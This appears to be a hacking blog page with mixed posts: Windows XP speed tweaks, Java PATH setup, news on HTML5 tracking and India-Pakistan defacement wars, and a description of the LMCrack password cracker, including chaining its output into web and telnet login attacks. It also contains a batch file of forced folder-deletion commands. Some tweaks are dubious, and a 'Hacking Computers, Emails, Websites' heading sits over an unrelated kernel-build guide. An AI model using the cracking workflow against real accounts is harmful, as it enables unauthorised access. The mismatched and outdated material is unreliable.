

Author

Amol Bhure (ultra l33t) was born in Maharashtra on July 7, 1990. He is currently pursuing his B.E. in Bangalore. A cyber security professional, hacker, designer, and programmer, he has a keen interest in hacking and network security and has developed several techniques for defending and defacing websites. He is of the opinion that people should learn this art to prevent cyber attacks. Amol currently works as a member of the Bangalore chapter of 'Null International' as a network security specialist. Apart from this, he has done internships at Yahoo! India and Amazon India, and he has attended various international conferences, including NullCon Goa, c0c0n, ClubHack, Defcon, SecurityByte, ICFoCS, and OWASP. He is certified in RHCE, LPT, CEH v7, SCJP, and AFCEH. In programming he knows C, C++, C#, Java (SCJP), .NET, and PHP. Additionally, he knows hardware description languages such as VHDL and Verilog, as well as embedded microcontroller programming. He has been featured in Google's Hall of Fame, was named one of "India's top 10 hackers," and his blog was listed among the "world's top 50 hacking blogs."


Monday, December 27, 2010

Speed Up Windows Vista, 7, and XP

DISABLE INDEXING SERVICES
Indexing Services is a small program that uses large amounts of RAM and can
often make a computer endlessly loud and noisy. This system process indexes
and updates lists of all the files on your computer so that when you search
for something, the search runs faster by scanning the index lists. If you
rarely search your computer, this service is unnecessary. To disable it, do
the following:
1. Go to Start
2. Click Settings
3. Click Control Panel
4. Double-click Add/Remove Programs
5. Click the Add/Remove Window Components
6. Uncheck the Indexing services
7. Click Next

OPTIMISE DISPLAY SETTINGS
Windows XP can look sexy but displaying all the visual items can waste
system resources. To optimise:
1. Go to Start
2. Click Settings
3. Click Control Panel
4. Click System
5. Click Advanced tab
6. In the Performance tab click Settings
7. Leave only the following ticked:
- Show shadows under menus
- Show shadows under mouse pointer
- Show translucent selection rectangle
- Use drop shadows for icon labels on the desktop
- Use visual styles on windows and buttons

DISABLE PERFORMANCE COUNTERS
Windows XP has a performance monitor utility which monitors several areas of
your PC's performance. These utilities take up system resources so disabling
is a good idea.
To disable:
1. download and install the Extensible Performance Counter List
2. Then select each counter in turn in the 'Extensible performance counters'
window and clear the 'Performance counters enabled' checkbox at the bottom
of the window.

SPEEDUP FOLDER BROWSING
You may have noticed that every time you open My Computer to browse folders
there is a slight delay. This is because Windows XP automatically searches
for network files and printers every time you open Windows Explorer. To fix
this and speed up browsing significantly:
1. Open My Computer
2. Click on Tools menu
3. Click on Folder Options
4. Click on the View tab.
5. Uncheck the Automatically search for network folders and printers check
box
6. Click Apply
7. Click Ok
8. Reboot your computer

IMPROVE MEMORY USAGE
Cacheman Improves the performance of your computer by optimizing the disk
cache, memory and a number of other settings.
Once Installed:
1. Go to Show Wizard and select All
2. Run all the wizards by selecting Next or Finished until you are back to
the main menu. Use the defaults unless you know exactly what you are doing.
3. Exit and Save Cacheman
4. Restart Windows

OPTIMISE YOUR INTERNET CONNECTION
There are lots of ways to do this but by far the easiest is to run TCP/IP
Optimizer.
1. Download and install
2. Click the General Settings tab and select your Connection Speed (Kbps)
3. Click Network Adapter and choose the interface you use to connect to the
Internet
4. Check Optimal Settings then Apply
5. Reboot

OPTIMISE YOUR PAGEFILE
If you give your pagefile a fixed size it saves the operating system from
needing to resize the page file.
1. Right click on My Computer and select Properties
2. Select the Advanced tab
3. Under Performance choose the Settings button
4. Select the Advanced tab again and under Virtual Memory select Change
5. Highlight the drive containing your page file and make the initial Size
of the file the same as the Maximum Size of the file.
Windows XP sizes the page file to about 1.5X the amount of actual physical
memory by default. While this is good for systems with smaller amounts of
memory (under 512MB) it is unlikely that a typical XP desktop system will
ever need 1.5 X 512MB or more of virtual memory. If you have less than 512MB
of memory, leave the page file at its default size. If you have 512MB or
more, change the ratio to 1:1 page file size to physical memory size.
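The sizing rule above reduces to a couple of lines of arithmetic. Here it is as a Python sketch (the function name is my own; the 1.5x multiplier and 512 MB threshold are taken from the text):

```python
def recommended_pagefile_mb(physical_mb):
    """Suggested fixed pagefile size (initial = maximum), per the rule above:
    under 512 MB of RAM, keep the default 1.5x sizing; at 512 MB or more,
    use a 1:1 ratio of pagefile size to physical memory."""
    if physical_mb < 512:
        return int(physical_mb * 1.5)
    return physical_mb

print(recommended_pagefile_mb(256))   # 384 -- 1.5x default
print(recommended_pagefile_mb(1024))  # 1024 -- 1:1 ratio
```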

RUN BOOTVIS - IMPROVE BOOT TIMES
BootVis will significantly improve boot times
1. Download and Run
2. Select Trace
3. Select Next Boot and Driver Trace
4. A Trace Repetitions screen will appear, select Ok and Reboot
5. Upon reboot, BootVis will automatically start, analyze and log your
system's boot process. When it's done, in the menu go to Trace and select
Optimize System
6. Reboot.
7. When your machine has rebooted wait until you see the Optimizing System
box appear. Be patient and wait for the process to complete

REMOVE THE DESKTOP PICTURE
Your desktop background consumes a fair amount of memory and can slow the
loading time of your system. Removing it will improve performance.
1. Right click on Desktop and select Properties
2. Select the Desktop tab
3. In the Background window select None
4. Click Ok

REMOVE FONTS FOR SPEED
Fonts, especially TrueType fonts, use quite a bit of system resources. For
optimal performance, trim your fonts down to just those that you need to use
on a daily basis and fonts that applications may require.
1. Open Control Panel
2. Open the Fonts folder
3. Move fonts you don't need to a temporary directory (e.g. C:\FONTBKUP)
just in case you need or want to bring a few of them back. The more fonts
you uninstall, the more system resources you will gain.

DISABLE UNNECESSARY SERVICES
Because Windows XP has to be all things to all people it has many services
running that take up system resources that you will never need. Below is a
list of services that can be disabled on most machines:
Alerter
Clipbook
Computer Browser
Distributed Link Tracking Client
Fast User Switching
Help and Support - (If you use Windows Help and Support leave this enabled)
Human Interface Device Access
Indexing Service
IPSEC Services
Messenger
Netmeeting Remote Desktop Sharing (disabled for extra security)
Portable Media Serial Number
Remote Desktop Help Session Manager (disabled for extra security)
Remote Procedure Call Locator
Remote Registry (disabled for extra security)
Remote Registry Service
Secondary Logon
Routing & Remote Access (disabled for extra security)
Server
SSDP Discovery Service - (Unplug n' Pray will disable this)
Telnet
TCP/IP NetBIOS Helper
Upload Manager
Universal Plug and Play Device Host
Windows Time
Wireless Zero Configuration (Do not disable if you use a wireless network)
Workstation
To disable these services:
Go to Start, then Run, and type "services.msc"
Double-click on the service you want to change
Change the startup type to 'Disabled'

TURN OFF SYSTEM RESTORE
System Restore can be a useful if your computer is having problems, however
storing all the restore points can literally take up Gigabytes of space on
your hard drive. To turn off System Restore:
Open Control Panel
Click on Performance and Maintenance
Click on System
Click on the System Restore tab
Tick 'Turn off System Restore on All Drives'
Click 'Ok'

DEFRAGMENT YOUR PAGEFILE
Keeping your pagefile defragmented can provide a major performance boost.
One of the best ways of doing this is to create a separate partition on your
hard drive just for your page file, so that it doesn't get impacted by
normal disk usage. Another way of keeping your pagefile defragmented is to
run PageDefrag. This cool little app can be used to defrag your pagefile,
and can also be set to defrag the pagefile everytime your PC starts. To
install:
Download and Run PageDefrag
Tick "Defrag at next Reboot",
Click "Ok"
Reboot

SPEEDUP FOLDER ACCESS - DISABLE LAST ACCESS UPDATE
If you have a lot of folders and subdirectories on your computer, when you
access a directory XP wastes a lot of time updating the time stamp showing
the last access time for that directory and for ALL subdirectories. To stop
XP doing this you need to edit the registry. If you are uncomfortable doing
this then please do not attempt it.
Go to Start and then Run and type "regedit"
Navigate to "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem"
Right-click in a blank area of the window on the right and select New >
DWORD Value
Name the new DWORD value 'NtfsDisableLastAccessUpdate'
Then right-click on the new value and select 'Modify'
Change the Value Data to '1'
Click 'OK'

DISABLE SYSTEM SOUNDS
Surprisingly, the beeps that your computer makes for various system sounds
can slow it down, particularly at startup and shut-down. To fix this turn
off the system sounds:
Open Control Panel
Click Sounds and Audio Devices
Check Place volume icon in taskbar
Click Sounds Tab
Choose "No Sounds" for the Sound Scheme
Click "No" when asked whether to save the previous scheme
Click "Apply"
Click "OK"

IMPROVE BOOT TIMES
A great feature in Microsoft Windows XP is the ability to do a boot
defragment. This places all boot files next to each other on the disk to
allow for faster booting. By default this option is enabled, but on some
builds it is not, so here is how to turn it on:
Go to the Start Menu and click Run
Type in "Regedit" then click OK
Find "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction"
Select "Enable" from the list on the right
Right-click on it and select "Modify"
Change the value to "Y"
Reboot

IMPROVE SWAPFILE PERFORMANCE
If you have more than 256MB of RAM this tweak will considerably improve your
performance. It basically makes sure that your PC uses every last drop of
memory (faster than swap file) before it starts using the swap file.
Go to Start then Run
Type "msconfig.exe" then click OK
Click on the System.ini tab
Expand the 386enh section by clicking on the plus sign
Click on New, then in the blank box type "ConservativeSwapfileUsage=1"
Click OK
Restart PC

MAKE YOUR MENUS LOAD FASTER
This is one of my favourite tweaks as it makes a huge difference to how fast
your machine will 'feel'. What this tweak does is remove the slight delay
between clicking on a menu and XP displaying the menu.
Go to Start then Run
Type 'Regedit' then click 'Ok'
Find "HKEY_CURRENT_USER\Control Panel\Desktop"
Select "MenuShowDelay"
Right-click and select "Modify"
Reduce the number to around "100"
This is the delay time, in milliseconds, before a menu is opened. You can
set it to "0", but that can make Windows hard to use, as menus will open the
moment your mouse passes over them. I tend to go for anywhere between 50 and
150.

MAKE PROGRAMS LOAD FASTER
This little tweak tends to work for most programs. If your program doesn't
load properly just undo the change. For any program:
Right-click on the icon/shortcut you use to launch the program
Select properties
In the 'target' box, add ' /prefetch:1' at the end of the line.
Click "Ok"
Voila - your programs will now load faster.

IMPROVE XP SHUTDOWN SPEED
This tweak reduces the time XP waits before automatically closing any
running programs when you give it the command to shutdown.
Go to Start then select Run
Type 'Regedit' and click ok
Find 'HKEY_CURRENT_USER\Control Panel\Desktop'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now select 'HungAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now find 'HKEY_USERS\.DEFAULT\Control Panel\Desktop'
Select 'WaitToKillAppTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'
Now find 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control'
Select 'WaitToKillServiceTimeout'
Right click and select 'Modify'
Change the value to '1000'
Click 'OK'

SPEED UP BOOT TIMES I
This tweak works by creating a batch file to clear the temp and history
folders everytime you shutdown so that your PC doesn't waste time checking
these folders the next time it boots. It's quite simple to implement:
1. Open Notepad and create a new file with the following entries (replace
<YourUserName> with your own user name, and adjust the temp folder location
to match your system):
RD /S /Q "C:\Documents and Settings\<YourUserName>\Local Settings\History"
RD /S /Q "C:\Documents and Settings\Default User\Local Settings\History"
RD /S /Q "D:\Temp"
2. Save the file as anything you like, but it must have a '.bat' extension,
e.g. fastboot.bat or deltemp.bat
3. Click 'Start' then 'Run'
4. Type in 'gpedit.msc' and hit 'ok'
5. Click on 'Computer Configuration' then 'Windows Settings'
6. Double-click on 'Scripts' and then on 'Shutdown'
7. Click 'Add' and find the batch file that you created and then press 'Ok'
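For readers who prefer a script they can test before wiring it into a shutdown hook, the same cleanup logic can be sketched in Python (the directory paths below are hypothetical examples; point the list at your own history and temp folders):

```python
import shutil

def clear_history_dirs(dirs):
    """Remove each history/temp directory, ignoring any that are missing
    or locked -- the Python analogue of the RD /S /Q commands above."""
    for d in dirs:
        shutil.rmtree(d, ignore_errors=True)

# Hypothetical example paths; substitute your own profile's folders.
clear_history_dirs([
    r"C:\Documents and Settings\YourName\Local Settings\History",
    r"D:\Temp",
])
```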

SPEED UP BOOT TIMES II
When your PC starts it usually looks for any bootable media in any floppy or
cd-rom drives you have installed before it gets around to loading the
Operating System from the HDD. This can waste valuable time. To fix this we
need to make some changes to the Bios.
1. To enter the bios you usually press 'F2' or 'delete' when your PC starts
2. Navigate to the 'Boot' menu
3. Select 'Boot Sequence'
4. Then either move your Hard drive to the top position or set it as the
'First Device'
5. Press the 'Escape' key to leave the bios. Don't forget to save your
settings before exiting
Note: Once this change has been made, you won't be able to boot from a
floppy disc or a CD-rom. If for some strange reason you need to do this in
the future, just go back into your bios, repeat the steps above and put your
floppy or CD-rom back as the 'First Device'

SPEED UP BOOT TIMES III
When your computer boots up it usually has to check with the network to see
what IP addresses are free and then it grabs one of these. By configuring a
manually assigned IP address your boot time will improve. To do this do the
following:
1. Click on 'Start' and then 'Connect To/Show All Connections'
2. Right-click your network adapter card and click 'Properties'.
3. On the 'General' tab, select 'TCP/IP' in the list of services and click
'Properties'
4. In the TCP/IP properties, click 'Use the following IP address' and enter
an IP address for your PC. If you are using a router this is usually
192.168.0.xx or 192.168.1.xx. If you are not sure what address to use,
check with your ISP, or go to 'Start/Run', type 'cmd' and then run
'ipconfig /all'. This will show your current IP settings, which you will
need to copy.
5. Enter the correct details for 'Subnet mask', 'Default gateway' and 'DNS
Server'. Again if you are not sure what figures to enter use 'ipconfig/all'
as in stage 4.

FREE UP MEMORY
I found this useful app via FixMyXP. ClearMem is an excellent tool for
speeding up your XP computer (especially if your system has been on for a
while and you have a lot of applications open). It forces pages out of
physical memory and reduces the working sets of running processes to a
minimum. When you run this tool, the system pauses because of excessive
high-priority activity associated with trimming the working sets. To run
this tool, your paging file must be at least as large as physical memory. To
check your paging file:
1. Go to your control panel, then click on 'System', then go to the
'Advanced' Tab, and Under 'Performance' click 'Settings' then the 'Advanced'
Tab
2. On the Bottom you should see 'Virtual Memory' and a value. This is the
value that must be at least as large as how much memory is in your system.
3. If the Virtual Memory Value is smaller than your system memory, click
Change and change the Min Virtual Memory to a number that is greater than
your total system memory, then click 'Set' and Reboot.
4. Once you have rebooted install ClearMem

ENSURE XP IS USING DMA MODE
XP enables DMA for Hard-Drives and CD-Roms by default on most ATA or ATAPI
(IDE) devices. However, sometimes computers switch to PIO mode which is
slower for data transfer - a typical reason is because of a virus. To ensure
that your machine is using DMA:
1. Open 'Device Manager'
2. Double-click 'IDE ATA/ATAPI Controllers'
3. Right-click 'Primary Channel' and select 'Properties' and then 'Advanced
Settings'
4. In the 'Current Transfer Mode' drop-down box, select 'DMA if Available'
if the current setting is 'PIO Only'

ADD CORRECT NETWORK CARD SETTINGS
Some machines suffer from jerky graphics or high CPU usage even when the
machine is idle. A possible solution for this, which can also help network
performance, is to:
1. RightClick 'My Computer'
2. Select 'Manage'
3. Click on 'Device Manager'
4. DoubleClick your network adaptor under 'Network Adapters'
5. In the new window, select the 'Advanced' tab
6. Select 'Connection Type' and select the correct type for your card and
then Reboot

REMOVE ANNOYING DELETE CONFIRMATION MESSAGES
Although not strictly a performance tweak I love this fix as it makes my
machine 'feel' faster. I hate the annoying 'are you sure?' messages that XP
displays, especially if I have to use a laptop touchpad to close them. To
remove these messages:
1. Right-click on the 'Recycle Bin' on the desktop and then click
'Properties'
2. Clear the 'Display Delete Confirmation Dialog' check box and click 'Ok'
If you do accidentally delete a file, don't worry, as all is not lost. Just
go to your Recycle Bin and 'Restore' the file.

DISABLE PREFETCH ON LOW MEMORY SYSTEMS
Prefetch is designed to speed up program launching by preloading programs
into memory. This is not a good idea if memory is in short supply, as it can
make programs hang. To disable prefetch:
1. Click 'Start' then 'Run'
2. Type in 'Regedit' then click 'Ok'
3. Navigate to 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session
Manager\Memory Management\PrefetchParameters'
4. Right-click on "EnablePrefetcher" and set the value to '0'
5. Reboot.

Is This File Safe to Delete?

Occasionally, you'll want to delete unwanted files to free up space on your hard drive. It is usually easy to choose which .jpg, .doc or .xls documents to throw away.

However, what about the many gigabytes of .dat files? Are these safe to delete, or will deleting them cause your computer to crash?

The extension .dat stands for data file. Files with this extension are used by many applications, so you can't know what one contains without knowing the application that created it. Thankfully, even if you don't recognize the extension, the following steps can help determine whether any file type is safe to delete.

1. Back up the File: Copy it to a hard drive, CD, another computer, anything. Just make sure to save the file first so you can get it back if it turns out you actually need it.

2. Rename the File: After you rename the file, (remember to record the original name), use different applications on the computer and then reboot. If an error occurs due to the missing file name, you know what the file did and you can decide if you need to replace it. If no error occurred, move on to the next step.

3. Delete the File: First, make sure you've saved the file in step #1. After that, delete the file in question. Then, use your computer for a while, reboot, and experiment with different applications. If an error occurs, you know what the file did and can assess the situation from there. If no error appears, you're probably off the hook. Still it is important to keep the back up. An error may occur later if the file is connected to an application you rarely use.

4. The computer may not allow you to delete or rename the file. This indicates the file does matter. Use a tool, such as Process Explorer, available from Microsoft's website, to learn which application is using it. Then you can decide if you need to keep the file.
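The back-up-then-rename workflow in steps 1-3 can be sketched in Python (a hedged illustration only; the `.maybe_delete` suffix and the function names are my own, not from any tool mentioned above):

```python
import os
import shutil

def stage_for_deletion(path, backup_dir):
    """Step 1: copy the file somewhere safe; step 2: rename the original
    so any application that depends on it will raise an error."""
    os.makedirs(backup_dir, exist_ok=True)
    shutil.copy2(path, backup_dir)   # the backup you can restore from
    renamed = path + ".maybe_delete"
    os.rename(path, renamed)         # now use the machine and watch for errors
    return renamed

def restore(renamed, original):
    """If something complains, put the file back under its original name."""
    os.rename(renamed, original)
```

Only after the machine has run cleanly for a while (step 3) would you delete the renamed file and, eventually, the backup.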

Set Permanent Path In System For JAVA

  • It is possible to make the path setting permanent but you have to be very careful because your system might crash if you make a mistake. Proceed with extreme caution! 
  • Go to Control Panel, choose "System," click on the "Advanced" tab, and click on the "Environment Variables" button. In the lower list, "System variables," click on Path.

    Click "Edit" and at the end append
    ;C:\Program Files\Java\jdk1.5.0_09\bin
    (or the path to the appropriate folder where the latest version of JDK is installed). 
  • Do not put spaces before the appended path string.
  • Click OK on the path edit box and OK on the Environment Variables box.
  • The new setting will go into effect the next time you run Command Prompt.
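The append rule above (semicolon separator, no leading space) can be illustrated with a short sketch. The JDK folder is the example path from the text, and the helper name is my own:

```python
def append_to_path(current_path, new_entry):
    """Append a directory to a Windows-style PATH value, separated by ';'.
    Note there is no space before the new entry -- a leading space would
    corrupt the entry, which is what the warning above is about."""
    return current_path.rstrip(";") + ";" + new_entry

path = r"C:\WINDOWS\system32;C:\WINDOWS"
path = append_to_path(path, r"C:\Program Files\Java\jdk1.5.0_09\bin")
print(path)  # C:\WINDOWS\system32;C:\WINDOWS;C:\Program Files\Java\jdk1.5.0_09\bin
```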

Window Password Cracking

LMCrack works by searching for a password hash against a database of pre-computed hashes. The pre-computed hashes are derived from multiple dictionaries of real words rather than random character sequences. The pre-computed hashes are indexed to speed up the hash searching against the database.

Each 32-character hash is split into two 16-character halves, and each half is searched for against the database of pre-computed hashes independently of the other. Because the hash is composed of two independent halves, cracking will often result in a partial password being found, where one half exists in the database and the other does not.
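The split-and-look-up idea can be sketched in a few lines of Python. This is not LMCrack's code, just an illustration of the technique; the table entries below are placeholders, except for the well-known hash of an empty LM half:

```python
# Hypothetical pre-computed table mapping 16-hex-character half-hashes
# to the 7-character password halves that produce them.
PRECOMPUTED = {
    "AAD3B435B51404EE": "",          # well-known LM hash of an empty half
    "0123456789ABCDEF": "PASSWOR",   # made-up entry for illustration
}

def crack_lm(lm_hash):
    """Split a 32-character LM hash into two halves and look each up
    independently; a miss on one half yields only a partial password."""
    first, second = lm_hash[:16], lm_hash[16:]
    return PRECOMPUTED.get(first), PRECOMPUTED.get(second)

# One half found, one half missing -> a partial password.
print(crack_lm("0123456789ABCDEF" + "F" * 16))  # ('PASSWOR', None)
```

The independent halves are exactly why partial.dic entries arise: one 7-character fragment is recovered even when the other half is absent from the database.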

LMCrack outputs 5 files at the completion of a cracking run:

* cracked.txt - a file containing the successfully cracked usernames and passwords, delimited by a colon

* cracked.dic - a file containing all of the dictionary words found

* partial.dic - a file containing the partial password fragments

* newpwdump.txt - a rewritten PWDump file with the successfully cracked accounts removed

* stats.txt - the cumulative statistics for all cracking runs

The cracked.txt and cracked.dic files can be used as input for other password crackers, for example the cracked.txt file works nicely as input for Brutus for testing web based or telnet passwords. Partial.dic is useful as a dictionary file for L0pht to speed up the cracking of partially cracked passwords. Newpwdump.txt can be fed into other cracking programs such as rainbowcrack if a comprehensive password audit is required.

HTML 5 To Make Online Tracking Easy

Worries over internet privacy have spurred lawsuits, conspiracy theories and consumer anxiety as marketers and others invent new ways to track computer users on the internet. But the alarmists have not seen anything yet.

In the next few years, a powerful new suite of capabilities will become available to web developers that could give marketers and advertisers access to many more details about computer users' online activities. Nearly everyone who uses the internet will face the privacy risks that come with those capabilities, which are an integral part of the web language that will soon power the internet: HTML 5. 

The new web code, the fifth version of Hypertext Markup Language used to create web pages, is already in limited use, and it promises to usher in a new era of internet browsing within the next few years. It will make it easier for users to view multimedia content without downloading extra software; check email offline; or find a favourite restaurant or shop on a smart phone.

Most users will clearly welcome the additional features that come with the new web language. "It's going to change everything about the internet and the way we use it today," said James Cox, 27, a freelance consultant and software developer at Smokeclouds, a New York City start-up company. "It's not just HTML 5. It's the new Web." But others, while also enthusiastic about the changes, are more cautious.

Most web users are familiar with cookies, which make it possible, for example, to log on to websites without having to retype user names and passwords, or to keep track of items placed in virtual shopping carts before they are bought.

The new web language and its additional features present more tracking opportunities because the technology uses a process in which large amounts of data can be collected and stored on the user's hard drive while online. Because of that process, advertisers and others could, experts say, see weeks or even months of personal data. That could include a user's location, time zone, photographs, text from blogs, shopping cart contents, emails and a history of the web pages visited.

The new web language "gives trackers one more bucket to put tracking information into," said Hakon Wium Lie, the chief technology officer at Opera, a browser company.

Or as Pam Dixon, the executive director of the World Privacy Forum in California, said: "HTML 5 opens Pandora's box of tracking in the internet." The additional capabilities provided by the new web language are already being put to use by a California programmer who has created what, at first glance, could be a major new threat to online privacy.

Samy Kamkar, a California programmer best known in some circles for creating a virus called the "Samy Worm," which took down MySpace.com in 2005, has created a cookie that is not easily deleted, even by experts – something he calls an Evercookie.

Some observers call it a "supercookie" because it stores information in at least 10 places on a computer, far more than is usually found. It combines traditional tracking tools with new features that come with the new web language. In creating the cookie, Kamkar has drawn comments from bloggers across the internet, whose descriptions of it range from "extremely persistent" to "horrific." Kamkar, however, said he did not create it to violate anyone's privacy. He was curious about how advertisers tracked him on the internet. After cataloging what he found on his computer, he made the Evercookie to demonstrate just how thoroughly people's computers could be infiltrated by the latest internet technology.

"I think it's OK for them to say we want to provide better service," Kamkar said of advertisers who placed tracking cookies on his computer. "However, I should also be able to opt out because it is my computer." Kamkar, whose 2005 virus circumvented browser safeguards and added more than a million "friends" to his MySpace page in less than 20 hours, said he had no plans to profit from the Evercookie and did not intend to sell it to advertisers.

Saturday, December 11, 2010

Indian and Pakistani hackers at peace

A few years ago, Indian and Pakistani hacker groups launched an online war against each other. Every day, techies from both countries would log on and bring down or deface websites in each other's countries. By all accounts, the Indian and Pakistani Governments were not involved and this was the work of individuals and hacker groups.
Then on Nov 30, 2008 a statement was published in some blogs that the Indian and Pakistani hackers had made peace and decided not to attack each other. The hacker cyber peace deal held up till July 2010, but it seems that there is a new risk of cyber war between tech-savvy computer specialists from both countries. By all accounts, this is a war between individuals and groups rather than Government-sanctioned hacker attacks.
On Aug 15, 2010, the website of high-profile Indian businessman, politician and IPL team owner Vijay Mallya was defaced by Pakistani hackers, who left flags and pro-Pakistan text on the compromised site. Vijay Mallya is a media natural and was soon on Times, CNN and every media house that wanted his views on his personal website being attacked. It even made it to prime news time. No Indian mainstream media mentioned the fact that Pakistani sites were also attacked.
But it seems that Indian hackers have done the same thing. An Indian ethical hacker has compiled a list of sites hacked in both India and Pakistan over the weekend, and it seems that hundreds of Pakistani sites went down. The Pakistan attack was led by Pak Cyber Army and PakHaxors, while Indian hacker groups Indishell and Indian Cyber Army led the attack, or counter-attack. Are we witnessing the start of another hacking war between the two countries?

Indo Pak Cyber deal holds
A few years ago, Indian and Pakistani hacker groups launched an online war against each other. Every day, techies from both countries would log on and bring down or deface websites in each other's countries. By all accounts, the Indian and Pakistani Governments were not involved and this was the work of individuals and hacker groups.
Then on Nov 30, 2008 a statement was published in some blogs that the Indian and Pakistani hackers had made peace and decided not to attack each other.  In a joint statement to Chowrangi.com, PCA (Pakistan Cyber Army), Zombie_ksa (PAKbugs) and ICW (Indian Cyber Warriors and Hindu Militant Group) said they had made peace. (Full story at end of this article).
The cross-border hacker peace treaty held up well over the last few years. Then the dynamics changed in early July 2010, when the Pakistani Government arrested most members of the high-profile Pakistani hacking group PAKbugs. The Pakistan Government claims that it clamped down on PAKbugs due to complaints from within the country. Even as the Pakistan Government arrested PAKbugs, about 130 Pakistani sites were hacked.
Could Indian techies be mistakenly blamed for the hacking of 130 Pakistani sites?  No one was sure but the situation had all the ingredients of suspicion and misunderstanding and could blow up into another hacker war on the internet.
But if you needed more proof that there are many people in both Pakistan and India who want peace and good neighbourly relations, it came in the form of a statement by the powerful Pakistani hacking collective PCA (Pakistan Cyber Army). They told ProPakistani:

“Message from Pakistan Cyber Army on arrest of Pakbugs Members
If anyone has doubt that we are not the one who defaced ONGC then get a life first. If people have forgotten, then we are the same guys who defaced ONGC in response to the attack on OGRA. After which we did a peace deal with the groups involved on both sides of borders including “Pakbugs” and “ICW” but kids didn’t keep their promise and got arrested.
We told PakBugs many (many, many, many) times to not to deface/destroy Pakistani websites and infrastructure. We told them to take FIA and NR3C seriously – as these agencies are not bunch of NOOBS, we had warned Pakbugs that you people don’t know about the power and the resources that NR3C has got but they gave a damn to our words and ended up in their custody.
I feel sad about the kids but… it happened due to their carelessness and childish attitude, which eventually landed them in the jail.
If you people are upcoming hackers and don’t know about Prevention of Electronic Crimes Ordinance then go and read it on NR3C website. I fear that Pakbugs would have a jail of 7 years if they got trialed and if FIA bail them out with some punishment they should thank Allah and concentrate on their studies.
We always told Jawad (HUMZA) and other kids about the consequences that they may face if arrested. [Jawad correct me if I am wrong].
Request to FIA/NR3C
“It is our humble request to FIA (NR3C) authorities to consider the case realistically and don’t give the kids the capital punishment as they are kids and can improve if given a chance. If they get the capital punishment as mentioned in Prevention of Electronic Crimes Ordinance, then their future will be ruined. Sir, these are our kids and our force if given a direction“
Message for upcoming Hackers
Our message to upcoming hackers or people who are interested in this field is that there is nothing bad to have the knowledge of hacking or hacking techniques, what’s bad is the usage of such knowledge and skill against our own country, national and international organizations or departments – that may cause damage to our country and its repute in the world.  Don’t push your efforts to get famous. The fame will come with time.

Hacking Computers, Emails, Websites

What you need:

  1. A Linux box
  2. Root on this Linux box (or a sympathetic admin)
  3. The ability to reboot this box several times a day
  4. A compilation environment installed
  5. Some way to get the kernel source

In more detail:

  1. Your Linux box needs to have at least 300 MB of free disk space. Find out how much disk space you have free with the command df -h. If you need tips for clearing out some disk space, ask. Note that you can compile on one Linux box and run the kernel you compile on another Linux box. You should compile on the fastest Linux box possible. A 500 MHz Pentium III with 256 MB RAM will take around 40 minutes to compile a Linux kernel, a 1200 MHz Pentium III with 640 MB RAM will take around 10 minutes, whereas a Duron 800 MHz with 256 MB RAM will take around 5 minutes.
    I've personally worked with x86's, Alpha's, and PowerPC's, but if you have something else I'm willing to help you figure it out. When asking questions, be sure to let people know if you are compiling for something other than an x86.
  2. You don't _need_ root, but you at least need someone with root to set you up. What you need is the ability to boot your new kernel, which may include the ability to run LILO, to copy kernels to places outside your home directory, and the ability to reboot the machine. I do 99% of my kernel work as a non-root user. I compile in a directory owned by user val, and I made the directories I need to write to owned by user val. You can also give the user reboot a password, so you can reboot the machine without su-ing to root. Talk to your sysadmin to find out what you need to do.
  3. Ideally, your Linux box is something only you need. If other people need it during the day but don't at night, you can probably still use it. If you are concerned about making the box unusable, there are many ways to test a new kernel and then reboot back into your old kernel. Disk corruption is not as common as you think, but if you do not want to risk the data on your hard disk, you can use a ramdisk with your new kernel. (Ramdisks are explained later on.) You can also create a new partition on your hard disk and use that as your root filesystem when you are experimenting with new kernels.
  4. Hopefully, most people installed their Linux box with gcc and other compilation tools included. You can test to see if you have a compilation environment installed by copying the following into a file named hello.c:
     #include <stdio.h>

     int
     main (void)
     {
             printf ("Hello, world!\n");
             return 0;
     }
    
    And then compiling and running it with:
     $ gcc hello.c -o hello
     $ ./hello
    
     If this doesn't work, you will need to install a compilation environment. Usually the easiest way to do this is to install your distribution's compiler packages (gcc, make, and friends); failing that, re-install your machine.
  5. There are many different ways to get the kernel source, but my preferred one involves having a reasonably high bandwidth net connection. Otherwise, you can get the kernel source from your distribution CDs.
    Remember, if you have any questions, please ask them on the grrls-only list, instead of emailing someone privately. The list members will answer your questions politely and helpfully, and other list members will learn from the answers to your questions. Our goal is to never answer a question with "FAQ, read #14 on XYZ," or "Do a web search," or "RTFM." Communicating with other kernel developers is just as important as finding the answer to your question.
    Get the Source
    Now, you need to get the Linux source. There are many different ways of getting the Linux source, but I'll list them in order of preference. You only need to choose one of these options. While it's easiest to just install the source on your distribution CD, you'll need to stay up to date with the latest version of the Linux source if you want to participate in kernel development.
    Linus recommends not having a /usr/src/linux symbolic link to your kernel source tree. However, the /usr/src/linux link will sometimes be used as a default by some modules that compile outside the kernel. If you need it, make sure it points to the correct kernel tree. If it doesn't, modules that compile outside the kernel may use the wrong header files.
  6. Use BitKeeper to clone a Linux source repository. This is what I use, and it's what many other kernel hackers use, including the entire PowerPC team, Ted Ts'o, Rik van Riel, and Linus himself. Be warned, this requires downloading many megabytes of data, so don't use it if you have a slow link. This option also requires at least 1 GB of free disk space, which is significantly more than the other options.
  7. First, get BitKeeper: http://www.bitmover.com/cgi-bin/download.cgi Follow the instructions and it will tell you how to download and install BitKeeper. Then, clone the main Linux tree using BitKeeper:
     $ cd /usr/src        (or wherever you would like to work)
     $ bk clone bk://linux.bkbits.net/linux-2.6 linux-2.6
     $ cd linux-2.6
     $ bk -r co
  8. And now you have a kernel source tree! Learn more about how to use BitKeeper here:
    http://www.bitkeeper.com/Test.html
    1. FTP the kernel source from ftp.kernel.org. This is another bandwidth intensive operation, so don't use it if you have a slow link.
  9. FTP to your local kernel mirror, which is named:
    ftp.<country code>.kernel.org
    For example, I live in the US, so I do:
    $ ftp ftp.us.kernel.org
    Login (if necessary) with username ftp or anonymous. Change directory to pub/linux/kernel/v2.6 and download the latest kernel. For example, if the latest version is 2.6.9, download the file named:
    linux-2.6.9.tar.gz
